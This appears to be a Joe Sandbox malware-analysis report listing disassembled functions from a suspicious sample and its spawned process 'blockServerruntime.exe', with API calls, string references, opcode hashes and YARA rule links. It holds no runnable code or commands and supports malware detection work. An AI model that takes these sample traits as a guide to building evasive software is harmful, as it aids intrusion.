Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 4a93a3b1eaa9b4c52318da576a8e0cacddb57935d6677a300b71003da87ac7a4
Instruction ID: d94169a6973fb095c1764301b1f80f671a2ba21119f89bbb369f958ecde3165c
Opcode Fuzzy Hash: 4a93a3b1eaa9b4c52318da576a8e0cacddb57935d6677a300b71003da87ac7a4
Instruction Fuzzy Hash: 63112432A053245BDF18BF25DC06A7E3714EF01B22B088156FC05AB281CA35EF0587F4

Function 00D60889 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00010000,00D609D0,?,00000000,00000000), ref: 00D608AD
SetThreadPriority.KERNEL32(?,00000000), ref: 00D608F4

Part of subcall function 00D56E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56EAF

Strings

CreateThread failed, xrefs: 00D608B9

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: 52d553bb50cbca8c0d45b618c8d772ce177c96ea19c89f439994a05692746474
Instruction ID: 175e72730ae65f6365704aafb2ebd2dc206ee708e44c9ed1c940b5639215e4f5
Opcode Fuzzy Hash: 52d553bb50cbca8c0d45b618c8d772ce177c96ea19c89f439994a05692746474
Instruction Fuzzy Hash: F201D6B62443056FDB24AF54FC82B677B98EF51711F24002EFA86A72C0CEA1A8459774

Function 00D5130B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00D5DA98: _swprintf.LIBCMT ref: 00D5DABE
Part of subcall function 00D5DA98: _strlen.LIBCMT ref: 00D5DADF
Part of subcall function 00D5DA98: SetDlgItemTextW.USER32(?,00D8E154,?), ref: 00D5DB3F
Part of subcall function 00D5DA98: GetWindowRect.USER32(?,?), ref: 00D5DB79
Part of subcall function 00D5DA98: GetClientRect.USER32(?,?), ref: 00D5DB85

GetDlgItem.USER32(00000000,00003021), ref: 00D5134F
SetWindowTextW.USER32(00000000,00D835B4), ref: 00D51365

Strings

0, xrefs: 00D5130E

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: 374a7fb1dba02c193a0a5ed5dddbd7ad7c28b416fbeaeedb0a1a886b1c034fea
Instruction ID: 27286fed4e41647f3d7023607067be718b9ee4e6ade11db9bfa0d82c4259b8cb
Opcode Fuzzy Hash: 374a7fb1dba02c193a0a5ed5dddbd7ad7c28b416fbeaeedb0a1a886b1c034fea
Instruction Fuzzy Hash: 92F0813510034CAAEF251F6098197BA3B98BB20346F084614BD49946A1CB74C6999B30

Function 00D779B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00D7B610: GetEnvironmentStringsW.KERNEL32 ref: 00D7B619
Part of subcall function 00D7B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D7B63C
Part of subcall function 00D7B610: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D7B662
Part of subcall function 00D7B610: _free.LIBCMT ref: 00D7B675
Part of subcall function 00D7B610: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D7B684

_free.LIBCMT ref: 00D779FD
_free.LIBCMT ref: 00D77A04

Strings

8~, xrefs: 00D779B7, 00D779EA

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
String ID: 8~
API String ID: 400815659-4055589079
Opcode ID: bb95ab2ddffb908a92a43cf57f5c34369344524d3156f96fad90fada58399e12
Instruction ID: 5e67d3b8791d01bea6a4a8cc03153904b1532b6e17affaf099c99ac57a646ffa
Opcode Fuzzy Hash: bb95ab2ddffb908a92a43cf57f5c34369344524d3156f96fad90fada58399e12
Instruction Fuzzy Hash: D3E0E51790A51245A761723A2C17AAF0205CB82330BA09F1BF61CDB1C2FF508902107E

Function 00D6084E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00D60A78,?), ref: 00D60854
GetLastError.KERNEL32(?), ref: 00D60860

Part of subcall function 00D56E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56EAF

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00D60869

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: d0ca017872bdb5858f409a617afdd4993d811ca4ac5931f29c3ab86d526ac1a0
Instruction ID: 6917a78030a38be15d9d2613aac2adb91b6c3c068c6160f6fa446abc6a90ea3c
Opcode Fuzzy Hash: d0ca017872bdb5858f409a617afdd4993d811ca4ac5931f29c3ab86d526ac1a0
Instruction Fuzzy Hash: A9D02E3290C1202BCE003B24AC0AEAF3E048F02B31F604314FA3CAA2F4DA200A0083F5

Function 00D5DA4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00D5D32F,?), ref: 00D5DA53
FindResourceW.KERNEL32(00000000,RTL,00000005,?,00D5D32F,?), ref: 00D5DA61

Strings

RTL, xrefs: 00D5DA5B

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: c24f8edfff46da1e3a36d7f1362b5d71a76e1a420134d19e2ebd89dde2bbea2b
Instruction ID: 04ee228902b02150a12c36722428910a43de0bd0a11f2af111c1565e16894e46
Opcode Fuzzy Hash: c24f8edfff46da1e3a36d7f1362b5d71a76e1a420134d19e2ebd89dde2bbea2b
Instruction Fuzzy Hash: 01C0123169535077DB302B216C0DB4329485B10F52F19044CF549DA2D0D5E5C944C770

Function 00D7B5C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON

Download Yara Rule

APIs

GetCommandLineA.KERNEL32 ref: 00D7B5C0
GetCommandLineW.KERNEL32 ref: 00D7B5CB

Strings

`%~, xrefs: 00D7B5C6

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CommandLine
String ID: `%~
API String ID: 3253501508-3906510574
Opcode ID: 5a7a672d73af467f40ad6d46e8e6ffc4811598eb3563309ed8ca450144896997
Instruction ID: e180fdf4721d020f40e57a52414629b47b04584036896a82dd214cfb65f5497c
Opcode Fuzzy Hash: 5a7a672d73af467f40ad6d46e8e6ffc4811598eb3563309ed8ca450144896997
Instruction Fuzzy Hash: B1B0087D911341DBC7409FB4B92C1887BE4B658A523C416569419C2720D73541459F24

Analysis Process: blockServerruntime.exePID: 7436, Parent PID: 7388COMMON

Executed Functions

Function 00007FFD9BAA3434 Relevance: 1.7, Strings: 1, Instructions: 472COMMON

Download Yara Rule

Strings

N_H, xrefs: 00007FFD9BAA3760

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: N_H
API String ID: 0-343878021
Opcode ID: d257fba21f848cd6f02da2d7fbb186fc812ac890142e3f6e947b068b02bc79da
Instruction ID: 98ea1b8689f37762eabedc8a67c9a4616818ec5027f0266a03b81d678f350d3a
Opcode Fuzzy Hash: d257fba21f848cd6f02da2d7fbb186fc812ac890142e3f6e947b068b02bc79da
Instruction Fuzzy Hash: B1F10271A0AA4E8FEB59DB68C8697A97BF1FF59304F0101BED009C72E6DBB46501CB40

Function 00007FFD9BAAC825 Relevance: 1.6, Strings: 1, Instructions: 310COMMON

Download Yara Rule

Strings

{|N, xrefs: 00007FFD9BAAC83F

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: {|N
API String ID: 0-1628822698
Opcode ID: 5a55ded2d4c7a72c910a4918df945baeb123771fe8b088a3d679a56fb1e8b24e
Instruction ID: 8fb59898abfe7c1ad5d2bceeac34d6f96ab9aa4c6a662b9a76e7d6e796a57450
Opcode Fuzzy Hash: 5a55ded2d4c7a72c910a4918df945baeb123771fe8b088a3d679a56fb1e8b24e
Instruction Fuzzy Hash: 80B11430A0924E8FD725EF68C8686F97BA0FF59325F1541BBE459C70E6CA786544CB80

Function 00007FFD9BAACE08 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbe2ac735512aa05ca6e24b796246f31dcf45cdb2cb0b316bca61076c1b05710
Instruction ID: d7937c3510d085bbf551d5714e1e951d775b327ae000532cf584758de8ca40b6
Opcode Fuzzy Hash: bbe2ac735512aa05ca6e24b796246f31dcf45cdb2cb0b316bca61076c1b05710
Instruction Fuzzy Hash: 9AF19231E0A65E8FEBA4DFA888657FDBBB0FF04310F0141BAD45DD21A2DA786644CB41

Function 00007FFD9BAAAD08 Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc7267437ace4b63fd284447540bb8e4a8f719f94ac4ecc3e9c2b07384175c2b
Instruction ID: 7365fce8e162ea0a3eaa19f25a956a66d86937291ee1160802d5bb368bc04cd7
Opcode Fuzzy Hash: fc7267437ace4b63fd284447540bb8e4a8f719f94ac4ecc3e9c2b07384175c2b
Instruction Fuzzy Hash: 48E1E130A1A64E8FDB59DF64C8696FA3BF0FF19300F0145BAD429C71A6CB74A654CB80

Function 00007FFD9BAAAE50 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3bd5460e0423e6ca104cbc6a653e13950ccfad21fb266c1dea167e9c792cc8
Instruction ID: d01ff777cd184b44a0c871a0873c3e5a8d8d2d918d7ec2151d45d57fd6990e7c
Opcode Fuzzy Hash: 7d3bd5460e0423e6ca104cbc6a653e13950ccfad21fb266c1dea167e9c792cc8
Instruction Fuzzy Hash: 7FD1C730E0A65E8FEB64EB68C8696B9BBF1FF15300F0145BAD41DC71A2DE74A644CB41

Function 00007FFD9BAAA85D Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e63710e21df77cdd6abb28dcd887673bc58b47a41a53ff54dc9b69b8b6e6e7ab
Instruction ID: 5f32602a514c9db981aa467e1e2d2b323ac14d80bb56025a80377600bbf7e56a
Opcode Fuzzy Hash: e63710e21df77cdd6abb28dcd887673bc58b47a41a53ff54dc9b69b8b6e6e7ab
Instruction Fuzzy Hash: 8BB1B030A0A68E8FE756EF64C8696F97BF1FF19300F0645BBD409C70A2DA78A644C751

Function 00007FFD9BAACB20 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed07821ee085915e623631f6df9de0a3172faf5ee68f36f7853082f918898f7f
Instruction ID: 4dfd33ac15176b8beb2af5ce70ef8ca60a75d192c06bdac2f97c1de180b0a709
Opcode Fuzzy Hash: ed07821ee085915e623631f6df9de0a3172faf5ee68f36f7853082f918898f7f
Instruction Fuzzy Hash: 6AC17130A0A64E8FDB95EF64C8696F97BF0FF19300F0145BAD419D71A2DB74AA44CB41

Function 00007FFD9BAAED02 Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

L, xrefs: 00007FFD9BAAE945
8, xrefs: 00007FFD9BAAF0F0
{, xrefs: 00007FFD9BAAED16

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: 8$L${
API String ID: 0-932970885
Opcode ID: a3a32ce502722d2f286fc80be66d62e2820801a65d2e5649966088e9140b2149
Instruction ID: c1c6331851593878a771d37b3fef43096d91f243aa8e403e93cbdd0de48c8155
Opcode Fuzzy Hash: a3a32ce502722d2f286fc80be66d62e2820801a65d2e5649966088e9140b2149
Instruction Fuzzy Hash: DA11E870A0962D8BEBB8DF54C8A47E9B7B2BB54301F1041EAD40DA6690DB796BC0CF51

Function 00007FFD9BAAC48B Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

|N_^, xrefs: 00007FFD9BAAC801

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: |N_^
API String ID: 0-3411631514
Opcode ID: 3f41dbe5237ee475d48224effb634ce76f28b891635676d5db4c99aa79cd1239
Instruction ID: fa7fe4289eaaa4519a50ee8ebf27f120f8cc33dd381e5c6a4c9022c827910f95
Opcode Fuzzy Hash: 3f41dbe5237ee475d48224effb634ce76f28b891635676d5db4c99aa79cd1239
Instruction Fuzzy Hash: 3FC1B23094E68E8FEB669F648C256F93FB0FF16300F0645BBD458C70A2EA789644C751

Function 00007FFD9BAAC558 Relevance: 1.5, Strings: 1, Instructions: 275COMMON

Download Yara Rule

Strings

|N_^, xrefs: 00007FFD9BAAC801

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: |N_^
API String ID: 0-3411631514
Opcode ID: a8f2b811eef321bc90c52fa4ff52ba17599271152c35fc675950f9d5d5c70e35
Instruction ID: f7a5a1276f718ca1ed3b3abbcb28516a1efb2d7fd5d60b0c6c99849a60b23693
Opcode Fuzzy Hash: a8f2b811eef321bc90c52fa4ff52ba17599271152c35fc675950f9d5d5c70e35
Instruction Fuzzy Hash: E1919330A0E68E8FEB65EF6488246FA7BF0FF15300F0515BAD418C71A2EB78A544C751

Function 00007FFD9BAAE927 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

L, xrefs: 00007FFD9BAAE945

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 8922515fe7113bb415383c87c2868cfc475c20819dd65c61267aaf5808723d70
Instruction ID: 510c327035c937ded3425a752b8b8190c4abdba7d6487f2d564e7c6b741b1f0d
Opcode Fuzzy Hash: 8922515fe7113bb415383c87c2868cfc475c20819dd65c61267aaf5808723d70
Instruction Fuzzy Hash: 06F0AC70A0965D8BEBA4DF44C8A4BA977B2FB55301F1042A9D409D3250DF755BC0CF95

Function 00007FFD9BAAAE80 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5612f8752ae13e45f2b810d8880bb8e82190c9aaac71c0f83a663b7626871b65
Instruction ID: 358a731c5afbdb40bedc78fe154771660c816ac5fb5236a649f594f0ffebcd41
Opcode Fuzzy Hash: 5612f8752ae13e45f2b810d8880bb8e82190c9aaac71c0f83a663b7626871b65
Instruction Fuzzy Hash: 7E024D31E1964D8FEBA8DFA8C8647B8B7A2FF18304F4441BAD05DD71E6CA746940CB50

Function 00007FFD9BAACD7D Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b7d8b71460387e14532dfa0243621dc87b680ce8cf3565cddf44307aac5c6f
Instruction ID: 5c7ec0985e2bfaf039af42dcf766fbad3a55e92bfeb5971fbb993b6affaf0dd2
Opcode Fuzzy Hash: b8b7d8b71460387e14532dfa0243621dc87b680ce8cf3565cddf44307aac5c6f
Instruction Fuzzy Hash: B8D1E731E0E69E8FEB64AF688C252F9BBA0FF05311F0541BBD45DC61A2DE786644CB41

Function 00007FFD9BAAD8FF Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0feeb92fea88ee6f34a8156fa7abbae69ea954be21a7a0ce78585dab9c906d11
Instruction ID: f49d08a2ab8c6681ae5da995feddbe9fa0af8a6d6fe5a10046199d5d4d64a04f
Opcode Fuzzy Hash: 0feeb92fea88ee6f34a8156fa7abbae69ea954be21a7a0ce78585dab9c906d11
Instruction Fuzzy Hash: EAE18331A19A8D8FEBA8DF6488647B8B7B2FF19304F4501BED04DD71E2DA745944CB11

Function 00007FFD9BAA2CFA Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b69579c0ab541bf06ca359625ed8748bf05f0633cd6d9c40b7bc35a01e6fa619
Instruction ID: 4b83dba88b4e57d8a10cfff9a50a5b53b22344d3bd3e6a4425e41de3ef4cf4c7
Opcode Fuzzy Hash: b69579c0ab541bf06ca359625ed8748bf05f0633cd6d9c40b7bc35a01e6fa619
Instruction Fuzzy Hash: CAD1A430E0E64E8FEB61EBB4C9686E97BF1FF55300F0645B6D408D70A2DB78A6548721

Function 00007FFD9BAACDF5 Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f356140f01bae14e0b10ba82957a3d45005225dec739cffe2b996bc96611099
Instruction ID: 8887c3d21f45857213576bc91adc37cabe949becd9c8d936bf75af96cbc99b49
Opcode Fuzzy Hash: 7f356140f01bae14e0b10ba82957a3d45005225dec739cffe2b996bc96611099
Instruction Fuzzy Hash: 20D1E931A0E69E8FEB64AF688C352F9BBA0FF15310F0541BBD45DC61A2DE786644CB41

Function 00007FFD9BAAAE7D Relevance: .4, Instructions: 381COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9cc82948e573fefdb5b27b1fd41d7583940d246c6181106b5b72f7531f35490
Instruction ID: 4278b435e97367dcf477a7a9670b3d6ce7de05ac575a4429494d55b5c9a02fea
Opcode Fuzzy Hash: a9cc82948e573fefdb5b27b1fd41d7583940d246c6181106b5b72f7531f35490
Instruction Fuzzy Hash: DDD16F71A19A4D8FEBA8EF68C8647BCB7A2FF18304F4401BAD04DD71E6DA746940CB51

Function 00007FFD9BAAAC18 Relevance: .4, Instructions: 359COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1745920201.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9baa0000_blockServerruntime.jbxd

Similarity

API ID:
String ID:
API String ID:
